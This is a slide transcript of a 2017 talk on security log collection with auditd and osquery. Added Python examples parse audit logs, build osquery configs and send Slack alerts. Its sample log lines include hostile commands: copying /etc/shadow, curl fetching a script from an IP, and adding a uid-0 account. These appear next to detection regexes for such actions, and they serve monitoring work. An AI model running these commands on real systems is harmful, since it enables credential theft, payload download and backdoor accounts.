
Getting started with security log collection using OSS (OSSで始めるセキュリティログ収集) / oss-securitylog-builderscon2017

bungoume
August 05, 2017


Transcript

  1. Getting started with security log collection using OSS
    Yuri Umezaki
    builderscon tokyo 2017

  2. About me
    Yuri Umezaki
    DevOps: log analysis, search APIs, infrastructure management
    Python, Elasticsearch, Docker

  3. Quick poll: which is closest to your job?
    - Developer
    - Operations / infrastructure administrator
    - Security engineer

  4. Security threats
    Tampering, data leakage, ransomware, etc.
    (Diagram: firewall, IDS/IPS/WAF, servers holding confidential data, and so on)
    - External attacks
    - Insider misconduct (including operator mistakes)
    Threats lurk both outside and inside.

  5. Categories of security controls
    Generally divided into four:
    - Deterrence: make attackers think twice
    - Prevention: access control and the like
    - Detection: find problems and record the clues needed for recovery
    - Recovery: return to the state before the incident
    Most controls are defensive ones such as deterrence and prevention.

  6. How intrusions get noticed
    - Someone inside the company notices something suspicious
    - A friendly outside white-hat hacker gets in touch
    - A user inquiry brings it to light
    - The attacker tells you themselves ←
    Reportedly about half of cases are pointed out by outside parties*
    * FireEye M-Trends 2017: annual trends in security breaches and cyber attacks
    https://www.fireeye.jp/current-threats/annual-threat-report/mtrends.html

  7. Detecting external attacks
    - Detect suspicious traffic with access logs, IDS and the like
    - Detect with host-based security products
    The products sitting between the outside and the servers protect you to some extent,
    but in the end detection has to happen on the host (the server itself).
    So you want at least a minimum set of logs collected on the servers as well.

  8. Detecting insider misconduct
    - Who logs in to which server, and when
    - What they do on the server (operation logs)
    Authentication logs of system administrators are important.
    First, collect authentication and operation logs on the servers.

  9. How do you capture operation logs?
    - bash history, script command: recording is easily stopped or rewritten
    - psacct: arguments cannot be checked, and command names are length-limited
    - audit: looks good as an audit log

  10. audit log
    # systemctl start auditd
    # auditctl -a always,exit -F arch=b64 -S execve
    Records go to /var/log/audit/audit.log
    Even a plain ls produces several log lines, and they are hard to parse…
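
To show what "several lines per command" means in practice, here is an added example (my code, not from the talk) that groups the records auditd writes for one execve by their shared msg=audit(timestamp:serial) id and reconstructs the command line, including the hex-encoded form auditd uses for arguments containing spaces. The log lines are constructed in the auditd format; the process ids, uids and paths in them are invented.

```python
import re
from collections import defaultdict

# Constructed sample, modelled on what `auditctl -a always,exit -F arch=b64 -S execve`
# writes for two commands. Records of one execve share the id (timestamp:serial).
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1501900000.123:456): arch=c000003e syscall=59 success=yes exit=0 a0=55d3 a1=55d4 a2=55d5 a3=0 items=2 ppid=4242 pid=4243 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=3 comm="ls" exe="/bin/ls" key=(null)
type=EXECVE msg=audit(1501900000.123:456): argc=3 a0="ls" a1="-la" a2="/etc"
type=CWD msg=audit(1501900000.123:456): cwd="/home/alice"
type=PATH msg=audit(1501900000.123:456): item=0 name="/bin/ls" inode=131 dev=fd:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL
type=SYSCALL msg=audit(1501900000.987:457): arch=c000003e syscall=59 success=yes exit=0 a0=1 a1=2 a2=3 a3=0 items=2 ppid=4242 pid=4250 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=3 comm="cp" exe="/bin/cp" key=(null)
type=EXECVE msg=audit(1501900000.987:457): argc=3 a0="cp" a1="/etc/shadow" a2=2F746D702F6D7920646972
type=CWD msg=audit(1501900000.987:457): cwd="/root"
"""

RECORD_RE = re.compile(r'^type=(?P<type>\w+) msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\): (?P<body>.*)$')
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_fields(body):
    """Turn `k=v k2="v 2"` into a dict. Values keep their quotes so callers can tell a
    quoted string from auditd's hex encoding."""
    return dict(FIELD_RE.findall(body))

def decode_arg(raw):
    """auditd writes arguments quoted, or as uppercase hex when they contain spaces/control chars."""
    if raw.startswith('"'):
        return raw[1:-1]
    if re.fullmatch(r'(?:[0-9A-F]{2})+', raw):
        return bytes.fromhex(raw).decode('utf-8', 'replace')
    return raw

def group_events(text):
    """Group records by (timestamp, serial); each event maps record type -> fields."""
    events = defaultdict(dict)
    for line in text.splitlines():
        m = RECORD_RE.match(line)
        if not m:
            continue  # other record types or damaged lines: skip rather than guess
        events[(m['ts'], m['serial'])][m['type']] = parse_fields(m['body'])
    return events

def reconstruct_commands(text):
    """Return one dict per execve: who ran what, where, and with which effective uid."""
    commands = []
    ordered = sorted(group_events(text).items(), key=lambda kv: (float(kv[0][0]), int(kv[0][1])))
    for (ts, serial), recs in ordered:
        if 'EXECVE' not in recs or 'SYSCALL' not in recs:
            continue  # incomplete event (e.g. truncated log): do not invent a command
        execve, syscall = recs['EXECVE'], recs['SYSCALL']
        argv = [decode_arg(execve[f'a{i}']) for i in range(int(execve['argc']))]
        cwd_raw = recs.get('CWD', {}).get('cwd')
        commands.append({
            'serial': int(serial),
            'time': float(ts),
            'auid': int(syscall['auid']),  # login uid: survives su/sudo, the key for tracing insiders
            'euid': int(syscall['euid']),
            'exe': decode_arg(syscall['exe']),
            'cwd': decode_arg(cwd_raw) if cwd_raw else None,
            'cmdline': ' '.join(argv),
        })
    return commands

if __name__ == '__main__':
    for c in reconstruct_commands(SAMPLE_AUDIT_LOG):
        print(f"{c['time']:.3f} auid={c['auid']} euid={c['euid']} cwd={c['cwd']}: {c['cmdline']}")
```

The auid field is the part worth keeping even if you later switch to a parser such as go-audit or osquery: it is the uid the person logged in with, so it still identifies them after sudo or su, which is exactly what the insider-misconduct slides ask for.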

  11. Making use of the audit log
    As far as I know, the following parsers look handy:
    - go-audit: a tool by Slack that parses audit logs nicely
    - Elastic Beats: Filebeat 5.4 (2017/5/4) added an audit log parser!
    - osquery ← the one covered this time

  12. osquery
    A machine-state inspection tool by Facebook
    - Check running processes, login status and more with SQL (osqueryi)
    - Run queries on a schedule to emit logs, so it can be used for monitoring too (osqueryd)
    - Works not only on Linux but also on Windows and macOS
    Note: some tables are not available on every OS; audit events are Ubuntu and CentOS only.

  13. osquery
    As of 2017/8/3 it has 9501 stars on GitHub
    Listed 10th in Linux Security Tools (Top 100)*
    * https://linuxsecurity.expert/security-tools/top-100/

  14. Linux Security Tools (Top 100)
    * https://linuxsecurity.expert/security-tools/top-100/

  15. Exercise: osquery on a Mac
    $ brew install osquery

  16. Exercise: osquery on a Mac
    You can see everything down to the installed Chrome extensions.

  17. osqueryd on Linux
    Run osquery on a schedule and write the results to a log:
    vim /etc/osquery/osquery.conf
    service osqueryd restart

  18. osqueryd logs
    Results are written as JSON to
    /var/log/osquery/osqueryd.results.log

  19. audit events
    vim /etc/osquery/osquery.conf
    If you want a history of communication with the outside, add socket_events as well.

  20. audit events
    Put the following flags in /etc/osquery/osquery.flags (shown on the slide).
    To collect socket_events, one more flag is needed as well.

    (Note: enabling this option increases CPU usage.)

  21. process_events log
    The execution log for ls

  22. socket_events log

  23. File integrity monitoring
    Watch creation/modification/deletion per file or per path
    vim /etc/osquery/osquery.conf

  24. File integrity monitoring log
    Might serve as a replacement for AIDE, OSSEC, Tripwire and the like
    The log after echo "message" >> /etc/test

  25. osquery collects all sorts of things!
    I chose it for collecting authentication and operation logs, but:

    It looks capable enough to work as a host-based IDS
    The documentation is thorough
    Easy to use even for people not used to command-line tools (maybe)
    Can run on a schedule
    Results are emitted as JSON, so they are easy to put to use (important)

  26. How osqueryd works (roughly)
    Internally it uses RocksDB, a key-value data store
    https://code.facebook.com/posts/1411870269134471/how-rocksdb-is-used-in-osquery/
    When osqueryd runs a scheduled query,
    it checks whether a previous result for it is stored in RocksDB:
    - No stored data
      - output every row and store the result
    - A previous result is in the DB
      - compare the two data sets and output the difference

  27. How osqueryd works (roughly)
    Won't a change that is made and reverted between two scheduled checks go unnoticed?
    For file integrity monitoring:
    it is event-based monitoring, so the change information is retained
    (file events use inotify and FSEvents)
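
The two slides above describe a differential scheduler plus event-based tables; the following is an added example (my model of the behaviour, not osquery's own code) that reproduces both and shows why a modify-and-revert between two runs is invisible to a differential query yet still delivered by an event table. Query names, column names and the hash values are illustrative.

```python
import json

def row_key(row):
    """osqueryd treats a row as 'the same row' only if every column matches, so key on the whole row."""
    return json.dumps(row, sort_keys=True)

class DifferentialQuery:
    """Models one scheduled query: remembers the previous result (osqueryd keeps it in RocksDB)
    and emits only rows that appeared or disappeared since the last run."""
    def __init__(self, name):
        self.name = name
        self.previous = None  # None = nothing stored yet

    def run(self, rows):
        current = {row_key(r): r for r in rows}
        if self.previous is None:
            # first run: every row is reported as added, then the result is stored
            events = [{'name': self.name, 'action': 'added', 'columns': r} for r in current.values()]
        else:
            events = [{'name': self.name, 'action': 'added', 'columns': r}
                      for k, r in current.items() if k not in self.previous]
            events += [{'name': self.name, 'action': 'removed', 'columns': r}
                       for k, r in self.previous.items() if k not in current]
        self.previous = current
        return events

class EventTable:
    """Models an event-based table such as file_events: the OS (inotify/FSEvents) pushes each
    change into a buffer as it happens; the scheduled query merely drains the buffer."""
    def __init__(self):
        self.buffer = []

    def record(self, **change):
        self.buffer.append(change)

    def run(self):
        events, self.buffer = self.buffer, []
        return events

def polling_misses_reverted_change():
    """/etc/test is modified and restored between two runs of a snapshot-style hash query."""
    q = DifferentialQuery('etc_hashes')
    baseline = [{'path': '/etc/test', 'sha256': 'aaaa'}]
    q.run(baseline)                  # first run stores the baseline
    # ... hash becomes 'bbbb', then the file is restored to 'aaaa' before the next run ...
    return q.run(baseline) == []     # True: the differential sees nothing to report

def event_table_keeps_reverted_change():
    fe = EventTable()
    fe.record(target_path='/etc/test', action='UPDATED', sha256='bbbb')
    fe.record(target_path='/etc/test', action='UPDATED', sha256='aaaa')
    return [e['sha256'] for e in fe.run()]  # both changes arrive at the next scheduled run

def differential_reports_new_login():
    q = DifferentialQuery('logged_in_users')
    q.run([{'user': 'alice', 'host': '10.0.0.5'}])
    events = q.run([{'user': 'alice', 'host': '10.0.0.5'}, {'user': 'bob', 'host': '10.0.0.9'}])
    return [(e['action'], e['columns']['user']) for e in events]

if __name__ == '__main__':
    print(polling_misses_reverted_change())
    print(event_table_keeps_reverted_change())
    print(differential_reports_new_login())
```

The practical consequence: for anything where the transient state matters (file contents, short-lived processes, connections), use the event tables (file_events, process_events, socket_events) rather than a scheduled snapshot of the corresponding state table.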

  28. What to monitor (one example)
    - Authentication logs (login events)
    - Operation logs
    - Network logs
    - Hardware connection logs

  29. What to monitor (endpoints)
    - Chrome and Firefox plugins
    - Malware getting into browser extensions has become a problem in recent years
    - The list of libraries from homebrew and the like
      - Malware with names resembling well-known packages turns up on npm
    Suspected malware in "HTTP Headers", a Chrome extension used by 50,000 people
    http://blog.clock-up.jp/entry/2016/11/03/http-headers-malware
    Large numbers of malware packages with names closely resembling well-known software found on npmjs.com
    http://gfx.hatenablog.com/entry/2017/08/02/131537

  30. Packs
    osquery also ships with query packs:
    osquery_monitoring
    it_compliance, incident_response
    osx-attacks, vuln-management
    hardware-monitoring

  31. osquery.conf example
    Start with the packs plus the parts you actually use

  32. Don't forget logrotate
    The log volume gets substantial, so logrotate is a must:
    /etc/logrotate.d/osqueryd
    Daily can be painful, so hourly may be better
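
The osquery.conf, osquery.flags and logrotate contents from slides 17 through 32 are only shown as screenshots, so here is an added example (my own, not the speaker's config) that generates all three with the pieces the talk mentions: scheduled process_events, socket_events and logged_in_users queries, file_paths for integrity monitoring, the bundled packs, the audit flags, and an hourly rotation stanza. The flag names are osquery's documented ones (disable_audit, audit_allow_config, audit_allow_sockets, disable_events); the pack directory, query intervals and watched paths are my assumptions.

```python
import json
import os
import tempfile

# Paths named in the talk; everything else is this example's choice.
CONF_PATH = '/etc/osquery/osquery.conf'
FLAGS_PATH = '/etc/osquery/osquery.flags'
LOGROTATE_PATH = '/etc/logrotate.d/osqueryd'
RESULTS_LOG = '/var/log/osquery/osqueryd.results.log'
PACK_DIR = '/usr/share/osquery/packs'  # assumption: where the osquery packages install the bundled packs

def build_conf(enable_sockets=True, watched_paths=None):
    """Schedule the tables the talk cares about (who logged in, what ran, what talked to the
    network), plus file integrity monitoring and a few bundled packs."""
    # '%%' means recursive in osquery file_paths; '%' matches one path component
    watched_paths = watched_paths or ['/etc/%%', '/root/.ssh/%%', '/home/%/.ssh/%%']
    schedule = {
        'logged_in_users': {'query': 'SELECT user, host, tty, time FROM logged_in_users;', 'interval': 60},
        'process_events': {'query': 'SELECT auid, uid, path, cmdline, cwd, time FROM process_events;', 'interval': 30},
        'file_events': {'query': 'SELECT target_path, action, sha256, time FROM file_events;', 'interval': 60},
    }
    if enable_sockets:  # costs CPU (slides 20 and 40), so keep it switchable
        schedule['socket_events'] = {
            'query': 'SELECT auid, path, action, remote_address, remote_port, time FROM socket_events;',
            'interval': 30}
    return {
        'options': {'logger_path': '/var/log/osquery', 'schedule_splay_percent': 10},
        'schedule': schedule,
        'file_paths': {'etc_and_ssh': watched_paths},
        'packs': {
            'incident-response': f'{PACK_DIR}/incident-response.conf',
            'it-compliance': f'{PACK_DIR}/it-compliance.conf',
            'osquery-monitoring': f'{PACK_DIR}/osquery-monitoring.conf',
        },
    }

def build_flags(enable_sockets=True):
    """Flags from osquery's process-auditing documentation: enable the audit subsystem, let
    osqueryd manage the audit rules, and optionally subscribe to socket syscalls too."""
    flags = ['--disable_audit=false', '--audit_allow_config=true', '--disable_events=false']
    if enable_sockets:
        flags.append('--audit_allow_sockets=true')
    return flags

def build_logrotate(frequency='hourly', keep=48):
    """Rotate the results log hourly, as the talk suggests; copytruncate because osqueryd keeps
    the file open (assumption: accept the small loss window it implies)."""
    return (f"{RESULTS_LOG} {{\n    {frequency}\n    rotate {keep}\n    compress\n"
            "    missingok\n    notifempty\n    copytruncate\n}\n")

def write_all(root, enable_sockets=True):
    """Write the three files below `root` (use '/' on a real host) and re-parse the JSON,
    because osqueryd refuses to start on an invalid config."""
    written = {}
    for path, content in [
        (CONF_PATH, json.dumps(build_conf(enable_sockets), indent=2) + '\n'),
        (FLAGS_PATH, '\n'.join(build_flags(enable_sockets)) + '\n'),
        (LOGROTATE_PATH, build_logrotate()),
    ]:
        dest = os.path.join(root, path.lstrip('/'))
        os.makedirs(os.path.dirname(dest), exist_ok=True)
        with open(dest, 'w') as fh:
            fh.write(content)
        written[path] = dest
    with open(written[CONF_PATH]) as fh:
        json.load(fh)
    return written

def demo():
    """Write everything into a scratch directory so the example is safe to run anywhere."""
    return write_all(tempfile.mkdtemp(prefix='osquery-demo-'))

if __name__ == '__main__':
    for dest in demo().values():
        print(dest)
```

After copying the generated files into place on a Linux host, `service osqueryd restart` (as on slide 17) picks them up; watch CPU after enabling sockets, since the talk measured roughly 5% extra.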

  33. Collecting the logs
    S3

  34. Parsing with Fluentd
    The logs are JSON, so parsing them with fluentd is easy

  35. Storing the logs in Elasticsearch

  36. Users' command history

  37. sshd login attempts

  38. Using and operating the logs
    Once the logs are in Elasticsearch,
    ElastAlert or Watcher can be used to
    search for and notify on abnormal operations or commands that need attention

  39. Notifying a chat tool
    Send login events to Slack
    When a notification appears, the person who did it leaves a confirming comment,
    so you learn who is operating the server, when, and for what purpose

    That gives you information sharing plus (a kind of) multi-factor authentication
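
Slides 18, 34, 38 and 39 together describe a pipeline: read the JSON results log, pick out login events and commands that deserve attention, and post them to chat for the operator to confirm. This added example (mine, not the speaker's setup, which used Fluentd, Elasticsearch and ElastAlert/Watcher) does the same in plain Python over constructed osqueryd.results.log lines; the host names, addresses and the detection patterns are illustrative and should be tuned to your environment.

```python
import json
import re

# Constructed sample lines in the shape of /var/log/osquery/osqueryd.results.log
# (differential mode: one JSON object per line, "action" is "added" or "removed").
SAMPLE_RESULTS_LOG = """\
{"name": "logged_in_users", "hostIdentifier": "web01", "unixTime": 1501900000, "action": "added", "columns": {"user": "alice", "host": "203.0.113.7", "tty": "pts/0", "time": "1501899990"}}
{"name": "process_events", "hostIdentifier": "web01", "unixTime": 1501900030, "action": "added", "columns": {"auid": "1000", "uid": "1000", "path": "/bin/ls", "cmdline": "ls -la /etc", "cwd": "/home/alice"}}
{"name": "process_events", "hostIdentifier": "web01", "unixTime": 1501900060, "action": "added", "columns": {"auid": "1000", "uid": "0", "path": "/usr/sbin/useradd", "cmdline": "useradd -o -u 0 backup2", "cwd": "/root"}}
{"name": "process_events", "hostIdentifier": "web01", "unixTime": 1501900090, "action": "added", "columns": {"auid": "1000", "uid": "0", "path": "/usr/bin/curl", "cmdline": "curl -s http://198.51.100.9/x.sh", "cwd": "/tmp"}}
{"name": "logged_in_users", "hostIdentifier": "web01", "unixTime": 1501900120, "action": "removed", "columns": {"user": "alice", "host": "203.0.113.7", "tty": "pts/0", "time": "1501899990"}}
this line is not json and must not crash the pipeline
"""

# Starting-point rules for "commands that need attention"; extend per environment.
ATTENTION_RULES = [
    ('account-change', re.compile(r'^(useradd|usermod|userdel|passwd|visudo)\b')),
    ('privilege-esc',  re.compile(r'^(sudo|su)\b')),
    ('remote-fetch',   re.compile(r'^(curl|wget)\b.*https?://')),
    ('ssh-key-edit',   re.compile(r'authorized_keys')),
    ('log-tamper',     re.compile(r'^(rm|truncate|shred)\b.*/var/log/')),
]

def parse_results_log(text):
    """Yield one row per result, skipping non-JSON lines (partial writes around rotation happen)."""
    for line in text.splitlines():
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue
        if 'columns' in rec:
            yield rec
        elif 'snapshot' in rec:  # snapshot-mode queries carry a list of rows instead
            for row in rec['snapshot']:
                yield {**rec, 'columns': row, 'action': 'snapshot'}

def classify(rec):
    """Return an alert dict for rows worth a human's attention, otherwise None."""
    cols, host = rec['columns'], rec.get('hostIdentifier', '?')
    if rec['name'] == 'logged_in_users' and rec['action'] == 'added':
        return {'kind': 'login', 'host': host,
                'text': f"login on {host}: {cols['user']} from {cols['host']} ({cols['tty']})"}
    if rec['name'] == 'process_events':
        for kind, pattern in ATTENTION_RULES:
            if pattern.search(cols['cmdline']):
                who = f"auid={cols['auid']} uid={cols['uid']}"
                return {'kind': kind, 'host': host,
                        'text': f"{kind} on {host} ({who}, cwd {cols['cwd']}): {cols['cmdline']}"}
    return None

def build_alerts(text):
    return [a for a in (classify(r) for r in parse_results_log(text)) if a]

def slack_payload(alert):
    """Body for a Slack incoming webhook; whoever ran the command replies in-thread to confirm."""
    return {'text': f":rotating_light: {alert['text']}\n"
                    "If this was you, reply here with what you were doing."}

if __name__ == '__main__':
    for alert in build_alerts(SAMPLE_RESULTS_LOG):
        print(json.dumps(slack_payload(alert)))
```

Posting is a single HTTPS POST of that payload to the webhook URL (urllib.request is enough); the "removed" login row is deliberately ignored so that logouts do not generate noise, and the auid is reported alongside uid so that a root command is still attributed to the person who logged in.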

  40. Caveats
    - osquery development is active
      - it previously had a bug that increased disk IO (now fixed)
    - Memory usage is around 100 MB
    - Enabling socket monitoring consumes CPU (around 5%?)
    - osqueryd works on a schedule
      - completeness of the written logs is therefore a little weak
      - combine it with tools such as go-audit

  41. Getting started with security log collection using OSS
    Yuri Umezaki
    builderscon tokyo 2017

  42. Getting started with security log collection using OSS: osquery
    Yuri Umezaki
    builderscon tokyo 2017

  43. Summary
    - Design the whole setup so that the security operations burden stays low
    - Start putting the highest-priority logs to use first
    - Also consider mechanisms that prevent log tampering or loss
    - Establishing procedures for preventing attacks and recovering from them matters too

  44. osquery is not a silver bullet
    It is not "install osquery and you're done";
    use it in combination with other tools

  45. Let's start using osquery in Japan too